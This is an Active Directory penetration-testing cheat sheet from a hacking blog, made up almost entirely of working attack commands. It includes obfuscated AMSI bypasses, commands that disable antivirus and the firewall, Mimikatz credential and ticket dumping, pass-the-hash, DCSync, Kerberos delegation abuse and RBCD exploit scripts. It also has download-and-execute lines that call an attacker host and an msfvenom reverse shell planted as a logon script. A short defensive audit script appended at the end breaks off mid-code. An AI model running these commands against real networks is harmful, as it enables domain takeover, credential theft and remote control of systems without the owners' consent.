
Active Directory PenTest Cheat Sheet - Lateral Movement & Persistence Techniques

Hello Readers, welcome to Hacking Dream. Today's post is on Active Directory penetration testing; this is a continuation of

Use the commands at your own risk. I would suggest not testing these techniques in a production environment.

THIS IS CREATED FOR EDUCATIONAL AND ETHICAL PURPOSES ONLY; THE AUTHOR IS NOT RESPONSIBLE FOR ANY ILLEGAL ACTIVITIES DONE BY VISITORS

    


Bypassing JEA

#View all the commands that we have access to
get-command *

#View the source code of the Commands/cmdlets
Get-Command -ShowCommandInfo -Name CmdLet_NAME
Get-Command -ShowCommandInfo -Name Get-ChildItem

#using SharpMapExec to bypass JEA or find interesting items
.\SharpMapExec.exe ntlm winrm /user:USERNAME /password:"p@ssw0RD!" /domain:steins.local /computername:10.10.10.10

Note: JEA functions that pass caller input through ExpandString or Invoke-Expression may be vulnerable to command injection

#Examples of bypassing JEA through such functions
get-something -command 'Hello $([void] (Get-Item C:\))'
get-something -command '$(""; ipconfig)'

#If Full language mode is enabled

function test() {whoami};test

#Bypassing JEA if Start-Process is accessible
Enter-PSSession -ComputerName TARGET_SERVER -ConfigurationName JEA_ENDPOINT_NAME
Start-Process cmd.exe revshell.exe

Powershell Remote Access

Enable-PSRemoting #WinRM uses TCP port 5985 (HTTP) and 5986 (HTTPS)

#Start a PS Session
Enter-PSSession -ComputerName kurisu.steins.local

#inside the session, store the process list in a variable
$proc=Get-Process

#the variable lives in the remote session's state and can be read again later in the same session
$proc

#Start a new session and keep a handle to it
$sess = New-PSSession -ComputerName kurisu.steins.local

#check the session
$sess

#re-enter the saved session; it stays usable as long as we do not remove it

Enter-PSSession -Session $sess

or

$SecPassword = ConvertTo-SecureString 'PASSWORD@!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Steins.local\Bhanu_Admin', $SecPassword)

$s = New-PSSession -Credential $Cred
Enter-PSSession -Session $s

or
#login with the connection URL
Enter-PSSession -ConnectionUri http://10.10.10.10:5985/wsman -Credential $cred

#Add a Machine to TrustedHosts
net start winrm
Set-Item WSMan:\localhost\Client\TrustedHosts -Value "10.10.10.10"


#logging into a Server

Set-Item WSMan:\localhost\Client\TrustedHosts -Value "192.168.1.1"
$SecPassword = ConvertTo-SecureString 'Password' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('steins.local\USER', $SecPassword)
$sess=New-PSSession -ComputerName 192.168.1.1 -Credential $Cred -Authentication Negotiate
Enter-PSSession -Session $sess

#Copying files into an existing session using PowerShell
Copy-Item -ToSession $Sess -Path C:\mimikatz.exe -Destination C:\temp

One-to-Many - PSSession:
=============================
- Executes commands in parallel
- non-interactive
- Invoke-Command #cmdlet used to implement one-to-many
- can run scripts
- can use -Credential parameter to pass alternate creds

#Execute commands on a different machine:

Invoke-Command -ComputerName CruelSun -ScriptBlock{whoami;hostname}

#Execute commands on a list of servers
Invoke-Command -ComputerName (Get-Content servers.txt) -ScriptBlock{whoami;hostname}


#Run a file/command from a specific location
Invoke-Command -ComputerName CruelSun -Filepath C:\downloads\powerup.ps1

#If powershell is running in constraint language mode, we cannot run some cmdlets,etc..cannot use .Net classes as well. if the server is running with constrained lang mode, we cannot run .net classes and some other suspicious functions

#if you are unable to run the script - check the language:
Invoke-Command -ComputerName (Get-Content servers.txt) -ScriptBlock{$ExecutionContext.SessionState.LanguageMode}


#Run a local function on a remote machine (the function receives its arguments via $args):
Invoke-Command -ComputerName CruelSun -ScriptBlock ${function:Get-ADTrust} -ArgumentList steins.local

Invoke-Command -Filepath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content servers.txt)

Invoke-Command -ComputerName (Get-Content servers.txt) -ScriptBlock ${function:Get-PassHashes}


#Run a local script in a session:
#Load powerup.ps1 into the memory of the session
Invoke-Command -Filepath C:\downloads\powerup.ps1 -Session $sess

#powerup.ps1 functions will be loaded on the target session, so, we can run it directly

Enter-PSSession -Session $sess


Execute Stateful commands using Invoke-Command:

$sess = New-PSSession -ComputerName CruelSun
Invoke-Command -Session $sess -ScriptBlock {$Proc = Get-Process}
Invoke-Command -Session $sess -ScriptBlock {$Proc.Name}

Disable AV on a Target Machine and upload a file

#Create a session
$sess = New-PSsession -ComputerName Server1

#Disable AV and Firewall
Invoke-Command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess
Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-Command -ScriptBlock{netsh advfirewall set allprofiles state off} -Session $sess

#upload a file
Invoke-Command -Session $sess -FilePath C:\Invoke-Mimikatz.ps1

#login to the session

Enter-PSsession $sess

#Bypass AMSI
SET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

Converting Plain Text into RC4/NTLM hash

python
>>> import hashlib
>>> # NTLM is MD4 over the UTF-16LE encoded password; on Python builds against OpenSSL 3 the md4 digest needs the legacy provider
>>> print(hashlib.new('md4', 'Password123'.encode('utf-16le')).hexdigest())
8828530d622ef2cac9f91ec614f7ca79

OverPass The Hash

mimikatz.exe
sekurlsa::pth /user:USERNAME /domain:steins.local /rc4:58a478135a93ac3bf058a5e354fdb71 /run:powershell.exe

#Run commands as the user whose hash was passed

Invoke-Command -ComputerName Server1.steins.local -ScriptBlock{whoami; whoami /groups; hostname}

#Create a session
$sess = New-PSsession -ComputerName Server1

#Disable AV and Firewall
Invoke-Command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess
Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-Command -ScriptBlock{netsh advfirewall set allprofiles state off} -Session $sess

#login to the session
Enter-PSsession $sess

#Dump Creds from the target machine
IEX(New-Object Net.WebClient).downloadString('http://KALI_IP:8000/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;

Pass the Ticket

Mimikatz

#Tickets are exported to the present working directory
mimikatz.exe
#Export all the tickets
sekurlsa::tickets /export
kerberos::ptt ticket.kirbi

or

Import-Module .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::tickets /export" "exit"'
Invoke-Mimikatz -Command '"privilege::debug" "kerberos::ptt ticket.kirbi" "exit"'

#list the available tickets
klist

Rubeus

#Triage the available tickets
.\Rubeus.exe triage

#display all the available tickets; copy the base64 ticket, remove all spaces and save it as a .kirbi file, which can then be used for ptt
.\Rubeus.exe dump

#pass a ticket
.\Rubeus.exe ptt /ticket:BASE64_KERBEROS_TICKET.kirbi

#Kerberoast

.\Rubeus.exe kerberoast /domain:steins.local /user:User1 /format:hashcat /outfile:hash.txt

#AskTGT
Rubeus.exe asktgt /user:server$ /enctype:RC4 /rc4:da71cba0f3b7a64d4318bd52c5ed4237 /domain:steins.local /dc:dc.steins.local /ptt

#Impersonate as a user

Rubeus.exe s4u /ticket:srv1_tgt /impersonateuser:Administrator /outfile:TGS_administrator

#Create TGS and import into memory
Rubeus.exe s4u /impersonateuser:administrator /self /ptt /dc:dc.steins.local /ticket:srv_tgt /altservice:cifs/srv.steins.local /domain:steins.local

Mimikatz:

#Dump Credentials on a local machine using Mimikatz
Invoke-Mimikatz -DumpCreds

#Dump creds of a target machine/ DC creds:
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName steinsDC.steins.local

#Dump Creds on Multiple Remote Machines:
Invoke-Mimikatz -DumpCreds -ComputerName @("system1.steins.local","system2.steins.local")


#Over Pass the Hash - generate tokens from hashes (writes into lsass.exe)
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:steins.local /ntlm:NTLM_HASH /run:powershell.exe"'

sekurlsa::pth /user:Username /domain:steins.local /rc4:97179aeefd6f3a6d329c37184fc639af

Abusing PrinterBug

#find machines with unconstrained Delegation enabled
Get-ADComputer -Filter {TrustedForDelegation -eq $True}

#Compromise and login to the machine with unconstrained Delegation enabled
Invoke-Mimikatz -Command '"sekurlsa::pth /user:USERNAME /domain:steins.local /rc4:58a478135a93ac3bf058a5e354fdb71 /run:powershell.exe"'

#Run SpoolSample.exe on the machine with unconstrained delegation enabled

SpoolSample.exe TARGET_DOMAIN_FQDN UNCONSTRAINED_DOMAIN_FQDN

OR

proxychains python3 printerbug.py steins.local/[email protected] KALI_IP -hashes ':31d6cfe0d16ae931b73c59d7e0c089c0'

sudo proxychains ntlmrelayx.py -t smb://192.168.1.1 -smb2support

#Relay attacks - Capturing SMB hashes

Import-Module .\Inveigh.ps1

#Start collecting hashes; we will see a hash whenever a user tries to access something non-existent via SMB
Invoke-Inveigh -ConsoleOutput Y

#cracking the hashes captured from inveigh
hashcat -m 5600 hash rockyou.txt --force -r /usr/share/hashcat/rules/d3ad0ne.rule

Abusing ADIDNS

Import-Module .\Invoke-DNSUpdate.ps1
Invoke-DNSUpdate -DNSType A -DNSName test -DNSData 192.168.21.10 -Verbose

Import-Module .\Powermad.ps1
New-ADIDNSNode -Node * -Tombstone -Verbose
Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose

#Capture all the users hashes
Import-module .\Inveigh.ps1
Invoke-Inveigh -ConsoleOutput Y -adidns combo
Invoke-Inveigh -ConsoleOutput Y -DNS Y

#Relaying the hashes for command execution
Import-module .\InveighRelay.ps1
invoke-inveighrelay -ConsoleOutput Y -Target 192.168.2.1 -ShowHelp N -StatusOutput N -Command "powershell.exe -c iex(new-object system.net.webclient).downloadstring('http://10.10.10.10:/rev.ps1')"

DCSync Attack

- By default, members of the Administrators, Domain Admins, Enterprise Admins and Domain Controllers groups hold the replication privileges that DCSync needs

Import-Module ./Powerview.ps1

#Select the domain to attack
Get-ForestGlobalCatalog

#Get the object ACLs whose ObjectAceType matches DS-Replication for the domain and check whether any user we have access to holds DCSync privileges
Get-ObjectACL "DC=steins,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -like 'DS-Replication*') }


#Run Mimikatz as Domain Admin and run below command
mimikatz.exe
lsadump::dcsync /domain:steins.local /all /csv

or

Invoke-Mimikatz -Command '"lsadump::dcsync /user:steins.local\krbtgt"'


#use DCSync feature to get krbtgt hash from any machine(Need DA privs):
Invoke-Mimikatz -Command '"lsadump::dcsync /user:DOMAIN_NAME\krbtgt"'

#Downloading DC hashes without logging in as Domain Admin: the command below must be run as admin because it modifies the ACL
Set-ADACL -DistinguishedName 'DC=steins,DC=steins,DC=local' -Principal USERNAME -GUIDRight DCSync -Verbose

# Running as a low priv user
Invoke-Mimikatz -Command '"lsadump::dcsync /user:steins\krbtgt"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:steins\Administrator"'

Exploiting WriteDacl - DCSync

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity testlab.local -Rights DCSync


Once you have granted yourself this privilege, you may use the mimikatz dcsync function to dcsync the password of arbitrary principals on the domain

lsadump::dcsync /domain:testlab.local /user:Administrator

or

secretsdump.py username:[email protected]

or
aclpwn -f username -t steins.local --domain steins.local --server 10.10.10.10

Change User's Password in AD


#Requires PowerView (Get-PrincipalContext); resets the victim's password using admin credentials
$UserName = "VICTIM_Username"
$UserPassword = ConvertTo-SecureString 'P@$$W0rd' -AsPlainText -Force
$Domain = "DOMAIN_name"

$SecPassword = ConvertTo-SecureString 'ADMIN_PASSWORD' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Domain\Admin_Username', $SecPassword)

$ContextArguments = @{ 'Identity' = $UserName }
$ContextArguments['Domain'] = $Domain
$ContextArguments['Credential'] = $Cred
$Context = Get-PrincipalContext @ContextArguments

$User = [System.DirectoryServices.AccountManagement.UserPrincipal]::FindByIdentity($Context.Context, $UserName)
if ($User) {
    Write-Verbose "Found user '$UserName'"
    try {
        $TempCred = New-Object System.Management.Automation.PSCredential('a', $UserPassword)
        $User.SetPassword($TempCred.GetNetworkCredential().Password)
        $User.Enabled = $True
        $Null = $User.Save()
        Write-Verbose "Password for user '$UserName' successfully reset"
    }
    catch {
        Write-Warning "Error setting password for user '$UserName' : $_"
    }
}
else {
    Write-Warning "Unable to find user '$UserName'"
}

Un-Constrained Delegation

Ignore domain controllers in the list of machines with unconstrained delegation enabled; they have it by default

#Find systems with UnConstrained Delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}

Get-NetComputer -UnConstrained

#Get the hash of the Unconstrained_user to log in as that user.


#start PowerShell as that user (over pass the hash)
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Unconstrained_user /domain:steins.local /ntlm:NTLM_HASH /run:powershell.exe"'

#check if this user has local admin access on any machine
. .\powerview.ps1
Find-LocalAdminAccess

#Login to the machine on which unconstrained-account has local admin access

$sess = New-PSSession -ComputerName unconstrained_machine.steins.local

#Bypass AMSI
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

#Run Mimikatz on the target
Invoke-Command -FilePath C:\downloads\Invoke-Mimikatz.ps1 -Session $sess

#Downloads all the tickets from the lsass and saves them on the disk
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

#use the downloaded ticket and dump it into the memory to access other stuff
Invoke-Mimikatz -Command '"kerberos::ptt KIRBI_TICKET_Path"'

Resource Based Constrained Delegation - Lateral Movement

#Import Powermad powershell module
Import-Module .\Powermad.psd1

#adding a machine object; a normal domain user can add up to 10 machines to the domain by default (ms-DS-MachineAccountQuota).
New-MachineAccount -Domain steins.local -DomainController 192.168.2.1 -MachineAccount might$ -Password (ConvertTo-SecureString 'PASSWORD' -AsPlainText -Force) -Verbose

#find a machine to which we have write permission using ACL Scanner/bloodhound

#Configure resource-based constrained delegation on Server1 (this needs write permission on Server1's computer object); afterwards the 'might' machine account can impersonate any domain user to Server1
Set-ADComputer Server1 -PrincipalsAllowedToDelegateToAccount might -Verbose

#view the permission that we set now
Get-ADComputer Server1 -Server Server1.steins.local -Properties name,msDS-AllowedToActOnBehalfOfOtherIdentity,PrincipalsAllowedToDelegateToAccount,msDS-AllowedToDelegateTo,TrustedToAuthForDelegation

#Inject the ticket
.\Rubeus.exe s4u /user:might$ /rc4:58a478135a93ac3bf058a5ea0e8fdb71 /domain:steins.local /msdsspn:cifs/server1.steins.local /impersonateuser:Administrator /dc:dc.steins.local /ptt

#access the target machine
Enter-PSSession -ComputerName server1.steins.local


RBCD Persistence

-If we have DA permissions, we can use the RACE toolkit (https://github.com/samratashok/RACE ) to modify permissions of a computer object and use it later

#Sets RBCD on Server1 and assigns write permissions on Server1 to USERNAME
Set-DCPermissions -Method RBCD -DistinguishedName 'CN=server1,DC=steins,DC=local' -SAMAccountName USERNAME -Verbose

#run on the attacker machine to allow delegation for the 'might' machine account
Set-ADComputer -Identity Server1 -PrincipalsAllowedToDelegateToAccount might$ -Verbose

#Inject the ticket
.\Rubeus.exe s4u /user:might$ /rc4:58a478135a93ac3bf058a5ea0e8fdb71 /domain:steins.local /msdsspn:cifs/server1.steins.local /impersonateuser:Administrator /dc:dc.steins.local /ptt



Resource Based Constrained Delegation on MSSQL Server 

#Add a DNS Record using
Invoke-DNSUpdate -DNSType A -DNSName might -DNSData KALI_IP -Realm Steins.local

#Login to the MSSQL Server and run xp_dirtree against the DNS name you just created
SQLCMD -S SERVER04\RE7_MS -Q "exec master.dbo.xp_dirtree '\\might@80\a'" -U Admin -P Admin

#on your Kali box, run rbcd_relay.py; on success it reports that
#msDS-AllowedToActOnBehalfOfOtherIdentity was added to object SQL_server4$ for object USER
sudo proxychains python rbcd_relay.py 192.168.1.2 steins.local SQL_server4$ USER

#View the privileges of the user
Get-ADComputer server -Server steins.local -Properties name,msDS-AllowedToActOnBehalfOfOtherIdentity,Principalsallowedtodelegatetoaccount,msds-allowedtodelegateto,trustedtoauthfordelegation


#Get TGT and gain access to the server
proxychains python3 ./getST.py -dc-ip 192.168.2.1 -spn cifs/server.steins.local -impersonate sql_admin steins.local/sql_user:Password@123


export KRB5CCNAME=sql_admin.ccache;sudo proxychains psexec.py user/[email protected] -k -no-pass -dc-ip 192.168.2.10 -target-ip 192.168.2.1

OR

.\Rubeus.exe s4u /user:sql_user /rc4:58a478135a93ac3bf058a5ea0e8fdb71 /domain:steins.local /msdsspn:cifs/server.steins.local /impersonateuser:sql_admin /dc:dc.steins.local /ptt

dir \\server.steins.local\c$

psexec \\server.steins.local cmd.exe

Abusing UN-Constrained Delegation using SpoolSample

Delegation is explained in a separate post; go through that first.

#Find machines with unconstrained delegation enabled using PowerView
Get-NetComputer -UnConstrained    
Get-DomainComputer -UnConstrained  

#Find systems with UnConstrained Delegation using AD Module
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}


#Download SpoolSample and compile it and upload it on the server which has delegation=true
SpoolSample.exe TARGET_Server Delegation_enabled_server
Ex: SpoolSample.exe dc.steins.local delegated1.steins.local

#Run Rubeus as SYSTEM in an interactive window; right after you run SpoolSample.exe you should see the target server's TGT
#use psexec to run as NT Authority/System

Psexec -s -d -i cmd.exe
Rubeus.exe monitor /interval:1

Note: if you are not seeing the target's TGT in Rubeus even after many attempts, create a TGT for the server you have access to and try the target server again.
#Optional - generate a TGT for a server
Rubeus.exe asktgt /user:server1$ /enctype:RC4 /rc4:da71cba0f3b7a64d4318bd52c5ed4237 /domain:steins.local /dc:dc.steins.local /ptt

#From here you have many options: since you hold the target's TGT, generate a TGS for yourself with Rubeus.
#Copy the TGT, remove the spaces, base64-decode it and save it to a file.

#Generate a TGS into a file and import it later into memory
Rubeus.exe s4u /ticket:srv1_tgt /impersonateuser:Administrator /outfile:TGS_administrator /domain:steins.local /dc:dc.steins.local

#Importing into memory
Rubeus.exe ptt /ticket:TGS_TICKET

#Create a TGS for file system and import it directly into memory
Rubeus.exe s4u /impersonateuser:administrator /self /ptt /dc:dc.steins.local /ticket:srv1_tgt /altservice:cifs/server1.steins.local /domain:steins.local

dir \\server1.steins.local\C$

#gaining a shell
Rubeus.exe s4u /impersonateuser:administrator /self /ptt /dc:dc.steins.local /ticket:srv1_tgt /altservice:HOST/server1.steins.local /domain:steins.local

psexec.exe \\server1.steins.local cmd.exe

un-Constrained Delegation Rubeus cheatsheet

#List un-Constrained Delegation enabled users - PowerView

Get-DomainUser -ldapfilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)"

#List un-Constrained Delegation enabled Computers - PowerView
Get-DomainComputer -Unconstrained

#Obtain a TGT for the user allowed to delegate
.\Rubeus.exe asktgt /user:websvc /rc4:cc098f204c5887eaa8253e7c2749156f /outfile:TGT_websvc.kirbi

#Obtain a TGS of the Administrator user to self
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /impersonateuser:Administrator /outfile:TGS_administrator

#Obtain service TGS impersonating Administrator (CIFS)
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:[email protected][email protected] /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /outfile:TGS_administrator_CIFS

#Impersonate Administrator on different service (HOST)
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:[email protected][email protected] /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /altservice:HOST /outfile:TGS_administrator_HOST

#Load ticket in memory
.\Rubeus.exe ptt /ticket:TGS_administrator_CIFS_HOST-dcorp-mssql.dollarcorp.moneycorp.local 

Constrained Delegation

#find accounts with Constrained Delegation enabled using PowerView (dev)
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth


#find accounts with Constrained Delegation enabled using the Active Directory module
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

#Gain access to the constrained delegation enabled box and request a TGT; the file will be saved to disk
kekeo# tgt::ask /user:websvc /domain:steins.local /rc4:NTLM_HASH

#using s4u from Kekeo, we request a TGS and it is saved to a file
#service: only the services listed in the account's msDS-AllowedToDelegateTo can be requested; enumerate them with the AD module or PowerView
tgs::s4u /tgt:Tgt_TICKET_PATH.kirbi /user:[email protected] /service:cifs/server2.steins.local

or

tgs::s4u /tgt:Tgt_TICKET_PATH.kirbi /user:[email protected] /service:cifs/server2.steins.local|ldap/dc.steins.local

#Inject the TGS and gain a shell
Invoke-Mimikatz -command '"kerberos::ptt TGS_PATH.kirbi"'


Method-II

#using s4u from Kekeo_one (no SNAME validation)
#Here we get access not just to the service we are allowed to delegate to but to every service that uses the same machine account, as the service name is not validated. This way we can run attacks like DCSync without Domain Admin privileges

#Gain access to the constrained delegation enabled box and request a TGT; the file will be saved to disk
kekeo# tgt::ask /user:steins-adminsrv.steins.local /domain:steins.local /rc4:NTLM_HASH

#Get TGS by using the TGT
tgs::s4u /tgt:TGT_TICKET_PATH.kirbi /user:[email protected] /service:time/steins.local | ldap/steins.local


#Inject the TGS and gain a shell, now we should have access to ldap as administrator

Invoke-Mimikatz -command '"kerberos::ptt TGS_PATH.kirbi"'

#Run DCSync attack
Invoke-Mimikatz -Command '"lsadump::dcsync /user:steins.local\krbtgt"'

Abusing ACL - Generic All

Import-Module ./PowerView.ps1

#Find ACEs granting GenericAll and check whether we have that right on any group
Get-ObjectAcl -ResolveGUIDs | ? {($_.ActiveDirectoryRights -match 'GenericAll')}

#View the ACL's of the group
Get-ObjectAcl -ResolveGUIDs | ? {($_.objectdn -eq "CN=Domain Admins,DC=steins,DC=local") -and ($_.ActiveDirectoryRights -match 'GenericAll')}

#if your account has GenericAll Access to the group, we can add ourselves to the group
Add-DomainGroupMember -Identity 'Domain Admins' -Members UserName

#View if you are a part of the group
Get-DomainGroupMember -SamAccountName 'Domain Admins'

Abusing Generic Write on user

#find a user on whom we have GenericWrite access and set a logon script (containing a reverse shell) on the account, so when the user logs in we get a reverse shell

#Enumerate to find all objects with GenericWrite
Get-ObjectAcl -SamAccountName * -ResolveGUIDs | ? {($_.ActiveDirectoryRights -match 'GenericWrite')}


#Create a rev shell
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f exe > revshell.exe

#Copy the rev shell on a SMB share which is accessible to the target machine.

#Set the script path to the user
Set-DomainObject -Identity UserName -Set @{'scriptpath'='\\share\revshell.exe'} -Verbose

#start a listener; when the user logs in we get a reverse shell as that user.
rlwrap nc.exe -nvlp 9001

Generic Write - Constrained delegation attack

powershell.exe -ep bypass

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

import-module ./PowerView.ps1
import-module ./Powermad.ps1

New-MachineAccount -MachineAccount mighty -Password $(ConvertTo-SecureString 'Password@1234' -AsPlainText -Force) -Verbose

#if you do not have a shell as the user, run the two commands below and add -Credential $Cred to each command that needs to run with these creds

$SecPassword = ConvertTo-SecureString 'PASSWORD@123' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('steins.local\bhanu', $SecPassword)



#SID of the machine account we control
$ComputerSid = Get-DomainComputer mighty -Properties objectsid | Select -Expand objectsid

#build a security descriptor whose single ACE grants that SID full control, then serialise it to bytes
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)


#write the descriptor into the DC's msDS-AllowedToActOnBehalfOfOtherIdentity attribute
Get-DomainComputer Steins-DC.steins.local | Set-DomainObject -Credential $Cred -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -verbose


./Rubeus.exe hash /password:'Password@1234' /user:mighty /domain:roundsoft.local

./Rubeus.exe s4u /user:mighty$ /rc4:A0989207854B684F07B5B6FE68169A35 /impersonateuser:TARGET_User /msdsspn:cifs/Steins-DC /ptt

klist

dir \\steins-dc\c$ #check if it lists the directory

psexec.exe \\steins-dc cmd.exe

#Create a meterpreter shell using HackTheWorld and upload it to dc

certutil -f -split -urlcache http://10.10.10.10:8000/hac7777.exe

migrate the session to NT AUTHORITY\SYSTEM and download the registry hives

reg save HKLM\SYSTEM C:\system
reg save HKLM\SAM C:\sam


or use the below automated script

Generic Write -Constrained delegation attack


powershell.exe -ep bypass

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )


Import-Module .\PowerView.ps1
Import-Module .\Powermad.ps1
function exploit ($Machine){
    #create the machine account that will be allowed to delegate
    New-MachineAccount -MachineAccount $Machine -Password $(ConvertTo-SecureString 'Password@1234' -AsPlainText -Force) -Verbose
    $ComputerSid = Get-DomainComputer $Machine -Properties objectsid | Select -Expand objectsid
    Write-Output "[+] SID: $ComputerSid"
    #build a security descriptor granting that SID full control and write it to the DC's msDS-AllowedToActOnBehalfOfOtherIdentity
    $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
    $SDBytes = New-Object byte[] ($SD.BinaryLength)
    $SD.GetBinaryForm($SDBytes, 0)
    Get-DomainComputer STEINS-DC -SearchBase "LDAP://DC=steins,DC=local" | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -SearchBase "LDAP://DC=steins,DC=local" -verbose
    #read the attribute back and show the resulting DACL
    $RawBytes = Get-DomainComputer STEINS-DC -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
    $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
    $Descriptor.DiscretionaryAcl
    Write-Output "[+] Done!"
}

#save the script as mysrc.ps1

. .\mysrc.ps1
exploit mighty

./Rubeus.exe hash /password:'Password@1234' /user:mighty /domain:roundsoft.local

./Rubeus.exe s4u /user:mighty$ /rc4:A0989207854B684F07B5B6FE68169A35 /impersonateuser:TARGET_User /msdsspn:cifs/Steins-DC /ptt
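A defender-side counterpart to the RBCD lateral-movement steps and to the security-descriptor construction in the two Generic Write sections above, added here as an example; it is not part of the original post and not Powermad's or PowerView's code. It reports the domain's ms-DS-MachineAccountQuota, lists every computer whose msDS-AllowedToActOnBehalfOfOtherIdentity is populated together with the principals that descriptor grants, and flags computer objects whose mS-DS-CreatorSID shows they were created by a non-administrator through the quota. It assumes the RSAT ActiveDirectory module and read access to the domain; Get-RbcdAudit is a name chosen here.

```powershell
# Added audit example (not from the original post): find RBCD grants and
# machine accounts created through MachineAccountQuota.
# Assumes the RSAT ActiveDirectory module and read access to the domain.
Import-Module ActiveDirectory

function Get-RbcdAudit {
    param(
        # Container to audit; defaults to the whole domain
        [string]$SearchBase = (Get-ADDomain).DistinguishedName
    )

    # The quota that lets ordinary users create computer objects (10 by default)
    $domainDn = (Get-ADDomain).DistinguishedName
    $maq = (Get-ADObject -Identity $domainDn -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
    [pscustomobject]@{
        Finding   = 'MachineAccountQuota'
        Computer  = $domainDn
        Principal = 'Authenticated Users'
        Detail    = "ms-DS-MachineAccountQuota = $maq"
    }

    # 1. Computers with a populated msDS-AllowedToActOnBehalfOfOtherIdentity.
    #    The AD module exposes the attribute as an ActiveDirectorySecurity object,
    #    so the trustees of the DACL that was written are available via .Access.
    $rbcdHosts = Get-ADComputer -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' `
        -SearchBase $SearchBase -Properties msDS-AllowedToActOnBehalfOfOtherIdentity
    foreach ($computer in $rbcdHosts) {
        $acl = $computer.'msDS-AllowedToActOnBehalfOfOtherIdentity'
        foreach ($ace in $acl.Access) {
            [pscustomobject]@{
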